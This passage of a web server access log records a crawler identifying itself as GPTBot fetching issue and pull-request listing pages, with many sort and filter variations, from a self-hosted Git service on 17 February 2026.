+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9958] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:19:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" -[17/Feb/2026:19:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=open&type=all" -[17/Feb/2026:19:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:19:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10129] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=all&type=all" -[17/Feb/2026:19:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:19:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md?display=source" [Client 74.7.227.38] [Length 24249] [Gzip 6.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:19:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9939] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9935] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 